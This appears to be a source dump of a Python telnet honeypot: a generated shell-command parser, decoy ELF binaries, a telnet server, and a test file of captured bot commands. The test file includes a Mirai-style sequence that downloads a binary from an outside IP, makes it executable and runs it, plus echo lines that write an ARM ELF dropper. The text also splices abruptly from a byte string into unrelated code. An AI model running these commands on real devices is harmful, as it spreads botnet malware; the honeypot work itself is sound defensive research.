self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdbrac'][index0] = (address0, self._offset) return address0 def _read_args(self): address0, index0 = FAILURE, self._offset cached = self._cache['args'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_arg() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: index3, elements2 = self._offset, [] address4 = FAILURE remaining1, index4, elements3, address5 = 1, self._offset, [], True while address5 is not FAILURE: chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == ' ': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('" "') if address5 is not FAILURE: elements3.append(address5) remaining1 -= 1 if remaining1 <= 0: address4 = TreeNode(self._input[index4:self._offset], index4, elements3) self._offset = self._offset else: address4 = FAILURE if address4 is not FAILURE: elements2.append(address4) address6 = FAILURE address6 = self._read_arg() if address6 is not FAILURE: elements2.append(address6) else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 if elements2 is None: address3 = FAILURE else: address3 = TreeNode11(self._input[index3:self._offset], index3, elements2) self._offset = self._offset if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_args(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['args'][index0] = (address0, self._offset) return address0 def _read_arg(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_arg_quot1() if address0 is FAILURE: self._offset = index1 address0 = self._read_arg_quot2() if address0 is FAILURE: self._offset = index1 address0 = self._read_arg_noquot() if address0 is FAILURE: self._offset = index1 address0 = self._read_empty() if address0 is FAILURE: self._offset = index1 self._cache['arg'][index0] = (address0, self._offset) return address0 def _read_arg_noempty(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_noempty'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_arg_quot1() if address0 is FAILURE: self._offset = index1 address0 = self._read_arg_quot2() if address0 is FAILURE: self._offset = index1 address0 = self._read_arg_noquot() if address0 is FAILURE: self._offset = index1 self._cache['arg_noempty'][index0] = (address0, self._offset) return address0 def _read_arg_quot1(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_quot1'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '\'': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"\'"') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 is not None and Grammar.REGEX_1.search(chunk1): address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address3 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^\']') if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) address4 = FAILURE chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 1] if chunk2 == '\'': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"\'"') if address4 is not FAILURE: elements0.append(address4) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['arg_quot1'][index0] = (address0, self._offset) return address0 def _read_arg_quot2(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_quot2'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '"': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('\'"\'') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 is not None and Grammar.REGEX_2.search(chunk1): address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address3 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^"]') if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) address4 = FAILURE chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 1] if chunk2 == '"': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('\'"\'') if address4 is not FAILURE: elements0.append(address4) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['arg_quot2'][index0] = (address0, self._offset) return address0 def _read_arg_noquot(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_noquot'].get(index0) if cached: self._offset = cached[1] return cached[0] remaining0, index1, elements0, address1 = 1, self._offset, [], True while address1 is not FAILURE: chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 is not None and Grammar.REGEX_3.search(chunk0): address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^ ;|&()"\'><]') if address1 is not FAILURE: elements0.append(address1) remaining0 -= 1 if remaining0 <= 0: address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0) self._offset = self._offset else: address0 = FAILURE self._cache['arg_noquot'][index0] = (address0, self._offset) return address0 def _read_empty(self): address0, index0 = FAILURE, self._offset cached = self._cache['empty'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 0] if chunk0 == '': address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset) self._offset = self._offset + 0 else: address0 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('""') if address0 is FAILURE: address0 = TreeNode(self._input[index1:index1], index1) self._offset = index1 self._cache['empty'][index0] = (address0, self._offset) return address0 def _read_sep(self): address0, index0 = FAILURE, self._offset cached = self._cache['sep'].get(index0) if cached: self._offset = cached[1] return cached[0] remaining0, index1, elements0, address1 = 0, self._offset, [], True while address1 is not FAILURE: chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == ' ': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('" "') if address1 is not FAILURE: elements0.append(address1) remaining0 -= 1 if remaining0 <= 0: address0 = TreeNode(self._input[index1:self._offset], index1, elements0) self._offset = self._offset else: address0 = FAILURE self._cache['sep'][index0] = (address0, self._offset) return address0 class Parser(Grammar): def __init__(self, input, actions, types): self._input = input self._input_size = len(input) self._actions = actions self._types = types self._offset = 0 self._cache = defaultdict(dict) self._failure = 0 self._expected = [] def parse(self): tree = self._read_cmd() if tree is not FAILURE and self._offset == self._input_size: return tree if not self._expected: self._failure = self._offset self._expected.append('') raise ParseError(format_error(self._input, self._failure, self._expected)) def format_error(input, offset, expected): lines, line_no, position = input.split('\n'), 0, 0 while position <= offset: position += len(lines[line_no]) + 1 line_no += 1 message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1] message += line + '\n' position -= len(line) + 1 message += ' ' * (offset - position) return message + '^' def parse(input, actions=None, types=None): parser = Parser(input, actions, types) return parser.parse() ================================================ FILE: honeypot/shell/shell.py ================================================ import sys import traceback from grammar import parse, TreeNode from commands.base import Proc def filter_ascii(string): string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in " ") return string ### ELF_BIN_ARM = "\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00h\xc2\x00\x004\x00\x00\x00X^\x01\x00\x02\x00\x00\x054\x00 \x00\x08\x00(\x00\x1c\x00\x1b\x00\x01\x00\x00p\xc0X\x01\x00\xc0\xd8\x01\x00\xc0\xd8\x01\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x004\x00\x00\x004\x80\x00\x004\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x004\x01\x00\x004\x81\x00\x004\x81\x00\x00\x13\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\xdcX\x01\x00\xdcX\x01\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xdcX\x01\x00\xdcX\x02\x00\xdcX\x02\x00\x1c\x04\x00\x00\xbc\x10\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x02\x00\x00\x00\xe8X\x01\x00\xe8X\x02\x00\xe8X\x02\x00\x08\x01\x00\x00\x08\x01\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00H\x01\x00\x00H\x81\x00\x00H\x81\x00\x00D\x00\x00\x00D\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00Q\xe5td\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00/lib/ld-linux.so.3\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x1b\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00\x02Tz0\x80\x94\xc2\x8e%\xf1\xa4\xad\xc7D\xa9\x91q\x94\xdb\na\x00\x00\x00\x06\x00\x00\x00 \x00\x00\x00\n\x00\x00\x00\x00I\x10\x92\x02D\x1b&@\x10@\xe0B\x00`\x00\x91AA\x10\x00r\x11\x11aH\x14(\x00\x00\x00\x00\x08\x00\x00\x80\x90\t\x00 \x08\x00*\x00@\x00$\xad\x11\x10\x81,(\x00\x00\t@J!\x91\x19\xadA\x04\x80IE\x85\x85\xf0\x88\xb3h\x80\x02H\x08\x80\x80\x00\x08\x01(d\x0e!M\xe0\xa8D\x94\x02 \x00\x08\x01\x87)\x00\x08\n\x00J\x08\x0e\x01\xc0-\x00 @\x18\x80d\xe6 \x81\x02\x00\x89\n\x90\x00$\x0e\x8c\xb0(\x06\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x19\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00'\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00,\x00\x00\x000\x00\x00\x002\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00?\x00\x00\x00A\x00\x00\x00G\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00N\x00\x00\x00R\x00\x00\x00S\x00\x00\x00T\x00\x00\x00U\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00Y\x00\x00\x00Z\x00\x00\x00\\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00c\x00\x00\x00d\x00\x00\x00f\x00\x00\x00h\x00\x00\x00i\x00\x00\x00k\x00\x00\x00n\x00\x00\x00q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00\x00\x00\x00\x00\x00\x00u\x00\x00\x00v\x00\x00\x00y\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00{\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00~\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x08,\xae\xff_\x96\x93\x1c\x03}\x1eL\xa3Z\xef\x90V\xdb\x93\x1c\xa8vbICw)\x91,2@\xfd\xda\x80A\xb7\xed\xe9C+\xf1\x81B\x84\xcf\x18L\x0fvT<\x94\xca\x96\x93\x1c\xcd?\x0c\xaf\x88j\x06\xaf\x8dm\x94\x06\x08~\x92\x1c!t\xb0\x02\xe2\xad\xc6\x1b.N=\xf6\xdb\xf7\x00^\x01\xaf4\xe8_t;\xc5" ELF_BIN_X86 = "\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00>\x00\x01\x00\x00\x00P\x1c\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xb8\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\t\x00@\x00\x1c\x00\x1b\x00\x06\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x90\x04\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00X|\x00\x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00P\xe5td\x04\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00Q\xe5td\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00R\xe5td\x04\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00/lib64/ld-linux-x86-64.so.2\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00Y\xde\xf0\x1bLK": c.redirect_to(filename) elif operator == ">>": c.redirect_app(filename) elif operator == "<": c.redirect_from(filename) else: print "WARNING: unsupported redirect operator " + operator return c def make_cmdbrac(self, input, start, end, elements): return elements[2] def make_args(self, input, start, end, elements): if isinstance(elements[0], basestring): r = [ elements[0] ] else: r = [] for arg in elements[1].elements: if isinstance(arg.elements[1], basestring): r.append(arg.elements[1]) c = Command(r) return c def run(string, env): c = parse(filter_ascii(string).strip(), actions=Actions()) return c.run(env) def test_shell(): env = Env() while True: sys.stdout.write(" # ") sys.stdout.flush() line = sys.stdin.readline() if line == "": break if line == "\n": continue line = line[:-1] tree = run(line, env) sys.stdout.flush() ================================================ FILE: honeypot/shell/test.sh ================================================ #!/bin/bash canopy grammar.peg --lang python && python shell.py < test.txt ================================================ FILE: honeypot/shell/test.txt ================================================ cp ls cat dd rm echo busybox sh cd true false chmod uname : ps enable shell sh /bin/busybox ECCHI /bin/busybox ps; /bin/busybox ECCHI /bin/busybox cat /proc/mounts; /bin/busybox ECCHI /bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/. /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon /bin/busybox ECCHI rm /proc/.t; rm /proc/.sh; rm /proc/.human rm /sys/.t; rm /sys/.sh; rm /sys/.human rm /tmp/.t; rm /tmp/.sh; rm /tmp/.human rm /overlay/.t; rm /overlay/.sh; rm /overlay/.human rm /.t; rm /.sh; rm /.human rm /dev/.t; rm /dev/.sh; rm /dev/.human rm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human rm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human rm /dev/.t; rm /dev/.sh; rm /dev/.human cd /proc/ /bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI /bin/busybox cat /bin/echo /bin/busybox ECCHI /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI /bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI ./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE rm -rf upnp; > dvrpelper; /bin/busybox ECCHI cat /proc/mounts; (/bin/busybox DFYHE || :) echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x68\xab\xb1\x67\xe2\xc5\x41\x26\x00\x00\x00\x61\x65\x61" >> .s echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s cat .s /bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp; ================================================ FILE: honeypot/telnet.py ================================================ import struct import socket import traceback import time from thread import start_new_thread from session import Session from util.dbg import dbg from util.config import config class IPFilter: def __init__(self): self.map = {} self.timeout = config.get("telnet_ip_min_time_between_connections") def add_ip(self, ip): self.map[ip] = time.time() def is_allowed(self, ip): self.clean() return not(ip in self.map) def clean(self): todelete = [] for ip in self.map: if self.map[ip] + self.timeout < time.time(): todelete.append(ip) for ip in todelete: del self.map[ip] class Telnetd: cmds = {} cmds[240] = "SE - subnegoation end" cmds[241] = "NOP - no operation" cmds[242] = "DM - data mark" cmds[243] = "BRK - break" cmds[244] = "IP - interrupt process" cmds[245] = "AO - abort output" cmds[246] = "AYT - are you there" cmds[247] = "EC - erase char" cmds[248] = "EL - erase line" cmds[249] = "GA - go ahead" cmds[250] = "SB - subnegotiation" cmds[251] = "WILL - positive return" cmds[252] = "WONT - negative return" cmds[253] = "DO - set option" cmds[254] = "DONT - unset option" cmds[255] = "IAC - interpret as command" SE = 240 NOP = 241 DM = 242 BRK = 243 IP = 244 AO = 245 AYT = 246 EC = 247 EL = 248 GA = 249 SB = 250 WILL = 251 WONT = 252 DO = 253 DONT = 254 IAC = 255 # Options NAWS = 31 def __init__(self, addr, port): self.host = addr self.port = port self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.do_run = True self.ipfilter = IPFilter() def run(self): self.sock.bind((self.host, self.port)) self.sock.listen(10) self.sock.settimeout(None) dbg("Socket open on " + str(self.host) + ":" + str(self.port)) while self.do_run: try: self.handle() except: traceback.print_exc() self.sock.close() dbg("Socket Closed") def handle(self): conn = False try: conn, addr = self.sock.accept() dbg("Client connected at " + str(addr)) if self.ipfilter.is_allowed(addr[0]): self.ipfilter.add_ip(addr[0]) sess = TelnetSess(self, conn, addr) start_new_thread(sess.loop, ()) else: dbg("Connection limit for " + addr[0] + " exceeded, closing") conn.close() except: traceback.print_exc() def stop(self): self.do_run = False class TelnetSess: def __init__(self, serv, sock, remote): self.serv = serv self.sock = sock self.timeout = config.get("telnet_session_timeout") self.maxtime = config.get("telnet_max_session_length") self.db_id = 0 self.remote = remote self.session = None def loop(self): self.session = Session(self.send_string, self.remote[0]) dbg("Setting timeout to " + str(self.timeout) + " seconds") self.sock.settimeout(self.timeout) try: self.test_opt(1) # Kill of Session if longer than self.maxtime ts_start = int(time.time()) self.send_string("Login: ") u = self.recv_line() self.send_string("Password: ") p = self.recv_line() self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n") self.session.login(u, p) while True: l = self.recv_line() try: self.session.shell(l) except: traceback.print_exc() self.send_string("sh: error\r\n") if ts_start + self.maxtime < int(time.time()): dbg("Session too long. Killing off.") break except socket.timeout: dbg("Connection timed out") except EOFError: dbg("Connection closed") self.session.end() self.sock.close() def test_naws(self): #dbg("TEST NAWS") if self.test_opt(Telnetd.NAWS): self.need(Telnetd.IAC) self.need(Telnetd.SB) self.need(Telnetd.NAWS) w = self.recv_short() h = self.recv_short() self.need(Telnetd.IAC) self.need(Telnetd.SE) #dbg("TEST NAWS OK " + str(w) + "x" + str(h)) elif byte == Telnetd.WONT: pass #dgb("TEST NAWS FAILED") else: raise ValueError() def test_linemode(self): #dbg("TEST LINEMODE") if self.test_opt(34): self.need(Telnetd.IAC) self.need(Telnetd.SE) def test_opt(self, opt, do=True): #dbg("TEST " + str(opt)) self.send(Telnetd.IAC) if do: self.send(Telnetd.DO) else: self.send(Telnetd.DONT) self.send(opt) def send(self, byte): #if byte in Telnetd.cmds: # dbg("SEND " + str(Telnetd.cmds[byte])) #else: # dbg("SEND " + str(byte)) self.sock.send(chr(byte)) def send_string(self, msg): self.sock.send(msg) #dbg("SEND STRING LEN" + str(len(msg))) def recv(self): byte = self.sock.recv(1) if len(byte) == 0: raise EOFError byte = ord(byte) #if byte in Telnetd.cmds: # dbg("RECV " + str(Telnetd.cmds[byte])) #else: # dbg("RECV " + str(byte)) return byte def recv_line(self): line = "" while True: byte = self.recv() if byte == Telnetd.IAC: byte = self.recv() self.process_cmd(byte) elif byte == ord("\r"): pass elif byte == ord("\n"): break else: 